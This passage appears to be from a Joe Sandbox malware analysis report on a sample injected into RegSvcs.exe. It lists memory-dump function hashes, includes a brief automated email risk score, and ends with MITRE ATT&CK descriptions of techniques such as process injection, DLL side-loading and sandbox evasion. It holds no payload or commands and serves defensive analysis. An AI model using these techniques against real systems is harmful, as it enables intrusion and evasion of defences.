Instruction ID: 3e14b45f32e6a2260ab6cc7c968fbce89b45feb61d847c2459ffe24a28fc60fa
Opcode Fuzzy Hash: 11e9ef5f8faf0f3385a7f1c12874826890cb4aa5a6f08f403f086c63afbb281f
Instruction Fuzzy Hash: BC01A97150D7D08FD75757B084552983F61EF53264F1949CBF0C58B293C639584AD352

Function 06738A21 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9b4d4846d821059225fe587ae5f101c70d2e7089328baee40ffbdc8f271cc9
Instruction ID: 5223b3280c6217e95f176419950dbd84115e4a949d79ef6f361d0bb05679764b
Opcode Fuzzy Hash: 7b9b4d4846d821059225fe587ae5f101c70d2e7089328baee40ffbdc8f271cc9
Instruction Fuzzy Hash: 9EF0C23A2091905FC342E778A859466BBB6DFC661430D80DBF54DCFBA7CA229C06C7A1

Function 00FED808 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4555722631.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_fed000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3212ed588b362b4abc8856e79a5704872f59bf46137a98cd6e2281817c1d99
Instruction ID: 2af28c6ee1fbdc66987d84957588af80ddc2b6df69fe624267ccc7ea9aba228a
Opcode Fuzzy Hash: df3212ed588b362b4abc8856e79a5704872f59bf46137a98cd6e2281817c1d99
Instruction Fuzzy Hash: 82F0F6718043849EE7108B07DD84B67FFA8EF50734F18C55AED084B696C3799C44CAB0

Function 06736D15 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6920bb81959d7b92237cae1062b37481c5605f26f47691d6fdecc53bead8603
Instruction ID: 3851e6888217f25f1ab62d9bd95fe1c6ac2762804cb4189f5f90af1fd9bd371f
Opcode Fuzzy Hash: b6920bb81959d7b92237cae1062b37481c5605f26f47691d6fdecc53bead8603
Instruction Fuzzy Hash: C3F05922909284DFCB03CB74CD517997FA1EF4A204F1806EBC489CF163D5259901C392

Function 06736961 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc55799a5f397edc77a9f32bafbb58f71b218a7e4bb400405f3150d90256190
Instruction ID: be94d1c52ea82c29a4c89fbf5b7e0f1440733879c9665b55d8c073bc8c9f78af
Opcode Fuzzy Hash: 5cc55799a5f397edc77a9f32bafbb58f71b218a7e4bb400405f3150d90256190
Instruction Fuzzy Hash: A5F08235509250AFC385CF54D850862FBB2EF86204B19C8DEA4498B267C732EC13CB55

Function 01050899 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8efa03987eea58aec5422d5bcbccb283f4d5d98d5a0b606d8c7f70dddea97428
Instruction ID: eb2d362594a6489aa77928f05bb840fed43e21a501cb256af331c0d829ed4caa
Opcode Fuzzy Hash: 8efa03987eea58aec5422d5bcbccb283f4d5d98d5a0b606d8c7f70dddea97428
Instruction Fuzzy Hash: A8E0DF70905288EFCB01DFB4DC0147D7BB8EF0A30072140E7E909CB262DA306E01EB41

Function 06737F09 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3c16632e7b2bff9b4ea87a791d197446f7fa03fdc3def62ed486fc28498dd2b
Instruction ID: ade199f89c9628743d02bd58be4e7c1d54be3e71b82ad79276bf189d822f0e1c
Opcode Fuzzy Hash: c3c16632e7b2bff9b4ea87a791d197446f7fa03fdc3def62ed486fc28498dd2b
Instruction Fuzzy Hash: 9AE0D8316086509FC701DB58CC90586B7B0EF83200B05C98AD4889B226E631E90BCB92

Function 06738539 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a08894f47d90c7f79d9428a96925691cebc1441afe641ceb7a9a3422bb2c347
Instruction ID: 41ab455cf7b8385684943d5caf70c35f5dd7aab9aefa515c78e384917c79bbd8
Opcode Fuzzy Hash: 9a08894f47d90c7f79d9428a96925691cebc1441afe641ceb7a9a3422bb2c347
Instruction Fuzzy Hash: 19E0867190935CDFC742CFF488518D9BFB59F8620072501E7D909C7253E5314E04D7A2

Function 06738570 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea7e534054d0a465c3fbdfc1242cd8f40ec6881fb8cc43376735cc68979051a
Instruction ID: a16846904551d8e3235ccffa62f60912170d9b7391a59d52c9fe4fc339bd7e1a
Opcode Fuzzy Hash: 6ea7e534054d0a465c3fbdfc1242cd8f40ec6881fb8cc43376735cc68979051a
Instruction Fuzzy Hash: C9E086711191445FD241CAD4F940895BB61DF86500B14844EB48197213C1229D06C773

Function 06736700 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6a87c86a779479d37314dfd43dc2b8422cd016d4e766f47d35b10c34d5099f
Instruction ID: c57fc2b97e939cd5268545b11f3da02e255d3e853f5f57ab513e6109b823257a
Opcode Fuzzy Hash: ca6a87c86a779479d37314dfd43dc2b8422cd016d4e766f47d35b10c34d5099f
Instruction Fuzzy Hash: DCE0C27520C3A11FC346C6209810C52BB66EBC7200F0DD88BE891C7213C6518C0BC7A1

Function 06738AD0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1793907760b99b6ef0aaf913d2a216de568339464eeff28d380146c06f0e7f3
Instruction ID: d649bcb02daad7d90b126ad1fa5d67421954520afcd73f7b4593e11c51aaca89
Opcode Fuzzy Hash: b1793907760b99b6ef0aaf913d2a216de568339464eeff28d380146c06f0e7f3
Instruction Fuzzy Hash: 06D017A26192806FD345C6748C6AD82BBA69A97240719C99EF048CB2A3E521E806C726

Function 0673752B Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6180dfd01551259775039011a0ef6c50184bdd07d05bb7541dbf4bdc80959b82
Instruction ID: eaba0eeea59da76bdbee0da82f3c8dc93d88815f048f8ade48e80dbcd3e384f0
Opcode Fuzzy Hash: 6180dfd01551259775039011a0ef6c50184bdd07d05bb7541dbf4bdc80959b82
Instruction Fuzzy Hash: 2BE0127010C2915FC346CB64DD50967BFA69BC7610B14848EF48487153C6158D26D772

Function 06734A28 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f674993faadec6e78582d40c84d75c1a13009eaf604a95f731bda82b45bba5c
Instruction ID: 2cd11430bace43a5e0734fc8e478b59eff1f1511e3acad1b92833a0dc273de03
Opcode Fuzzy Hash: 7f674993faadec6e78582d40c84d75c1a13009eaf604a95f731bda82b45bba5c
Instruction Fuzzy Hash: 6BD0A7323042105BE240DA0CD851ADEB3A5FFC4228F05881FF44483301CB62EC078760

Function 067348F8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a73e490cf0aeb15c661ca193f4a86350d879a37ac5727363475d0d2b4d915f7
Instruction ID: b9f01944543c2689a88e991641a9887186dbf065ff37ba458e47b4d001f5bad8
Opcode Fuzzy Hash: 3a73e490cf0aeb15c661ca193f4a86350d879a37ac5727363475d0d2b4d915f7
Instruction Fuzzy Hash: C0D05E323042105BD240D90CD861ADEA3A5EBD8218F05885BE8908B301CBA2DC478660

Function 06736880 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e21a0cf32d4c2b96d5cb876b2ed401866b1f4301c9cc4f56ebaed9a363b970b
Instruction ID: 455392b56b578aa41b7aecfa7ce4302f300660b9107dbf6448803e40cb2fe4a3
Opcode Fuzzy Hash: 5e21a0cf32d4c2b96d5cb876b2ed401866b1f4301c9cc4f56ebaed9a363b970b
Instruction Fuzzy Hash: 97E0EC7650C2819FC302CB94E950945FFA29FCAA00B0988CAE5849B263C522DC26D732

Function 010508A8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71fa87fec89bb3aa8ead738076c7cd599a8c5bb23e43ae63b59e3e8e8435709d
Instruction ID: bc667a4e635f3b634704c34af6fe84a2663ba4f37b8a211fea4ad656874ed936
Opcode Fuzzy Hash: 71fa87fec89bb3aa8ead738076c7cd599a8c5bb23e43ae63b59e3e8e8435709d
Instruction Fuzzy Hash: 9AD01770A0114CEFCB00EFA8E94556EB7B9EF44204B2085AAE909D7251EA316F10AB81

Function 06734628 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb951aae2c5e5d94fed3e21928396811f794d50e69ae5caabc1eb6a9b9539948
Instruction ID: e2077a52d67c3103f19b9b88dea8775a511633945d8c9ffaedfeadad527beec3
Opcode Fuzzy Hash: fb951aae2c5e5d94fed3e21928396811f794d50e69ae5caabc1eb6a9b9539948
Instruction Fuzzy Hash: A9D05E762042009FD348DA48D851EAAB361FBC4214F15881BE88087700CB62DC478791

Function 06735EF9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58caa65b0249c720372b08d8dc4145ba4f0ed393a8d3ea8e78075f42785657f2
Instruction ID: fd712513f562ea640a2f4d36bf7075ffe19fb42312736f954cfda5a9e96a7943
Opcode Fuzzy Hash: 58caa65b0249c720372b08d8dc4145ba4f0ed393a8d3ea8e78075f42785657f2
Instruction Fuzzy Hash: C2D0127510D1539FD201CF54D910815BBA2DBD6604F05855EF48557352C722DC56C772

Function 06738548 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9753a7a88ed95edfa38d298f7fc3a7d3a361d0b700d6e89da74f65905da2c8c0
Instruction ID: 87cb7f1c091cba44ec0ae8a0590dcb4c5d3658f21420b2382f9b8b3282e2a75d
Opcode Fuzzy Hash: 9753a7a88ed95edfa38d298f7fc3a7d3a361d0b700d6e89da74f65905da2c8c0
Instruction Fuzzy Hash: DAD0C971E0120CEB8B00DFE9894189EBBF9EB89200B1045E69908D7211EA315A1097A2

Function 06735CD0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c217d6bacdd9e3bec3f57537cd97e60acaeb2c41a4191f24fca0a7aeaef8f274
Instruction ID: 94967c1694f61cf8bec9bfc4127d329fc74ee183beaa8d88e0c77010397c4610
Opcode Fuzzy Hash: c217d6bacdd9e3bec3f57537cd97e60acaeb2c41a4191f24fca0a7aeaef8f274
Instruction Fuzzy Hash: B4C0803000A3C01FE3468734CCD15827F615D4300431DC4D6D4858F197C616E947C757

Function 06736890 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 06738580 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 06734F40 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfec63bff0fd86b3eb4223bb7d19478d65cba52eb5d40d4bfbccf559abb82f3d
Instruction ID: 72b5212990494a07dea9679aa41c014f884bc3f5125ec7755e2fb34ce14d6190
Opcode Fuzzy Hash: dfec63bff0fd86b3eb4223bb7d19478d65cba52eb5d40d4bfbccf559abb82f3d
Instruction Fuzzy Hash: 5FC08CB37091100FE385C61CDCA17886BA59BC5309F0E80EAD084CF39BCB2AE8038900

Function 06737537 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 412d850437a538706b3bf1bffbb5cd359a0e216c383bede41fd36c3c42701044
Instruction ID: 5c89dc6d1d9e644d0c4423d7f0779e094ad8928452da242a30f2dfacf0a92b1d
Opcode Fuzzy Hash: 412d850437a538706b3bf1bffbb5cd359a0e216c383bede41fd36c3c42701044
Instruction Fuzzy Hash: 71D012712081119F8240CF44FA50D1AF7E59FC9A00F14884EB584E3341C622DC17CB72

Function 067355D0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d59eea7408e8a28cb63698f67c93932ae76b42909e52f393ed50e80e247ad77e
Instruction ID: 67e95ef3e2fe2b6bac6df3e076850568505de8dc5dd1f788ac0a28efb569af49
Opcode Fuzzy Hash: d59eea7408e8a28cb63698f67c93932ae76b42909e52f393ed50e80e247ad77e
Instruction Fuzzy Hash: 98C0123200A2818FE78A8664C856482BB639BC325432A84C6D8518F26BCA22AC0BC702

Function 01050880 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4556810259.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1050000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abef5266ea9b084a62fd588085742231a11a341a4f06f8f7f3bc165cd2378fca
Instruction ID: 5c34698748006552db93ac7468e34f1700014ce21e0bde38afa3dd4f7500f188
Opcode Fuzzy Hash: abef5266ea9b084a62fd588085742231a11a341a4f06f8f7f3bc165cd2378fca
Instruction Fuzzy Hash: FEC04C3560A2848FC70207A848111A43B70FF036057AA14CBC9829B277D128281E9719

Function 06738411 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5d99320b2f2bc339509d0dfb913479846a73cd6c29a8dd24f19ce3b63c3713
Instruction ID: f0bc501813162e6152697241548e6a5fd987665263509a1c6ab98a9dd3679e28
Opcode Fuzzy Hash: 8c5d99320b2f2bc339509d0dfb913479846a73cd6c29a8dd24f19ce3b63c3713
Instruction Fuzzy Hash: A1C0928540E3ED1EC3938F701C60310AFA40F23188B2A04DBA8C0CA4E3E16A898AC323

Function 06738420 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 06735CE0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 06735960 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 06734C50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4575247254.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6730000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
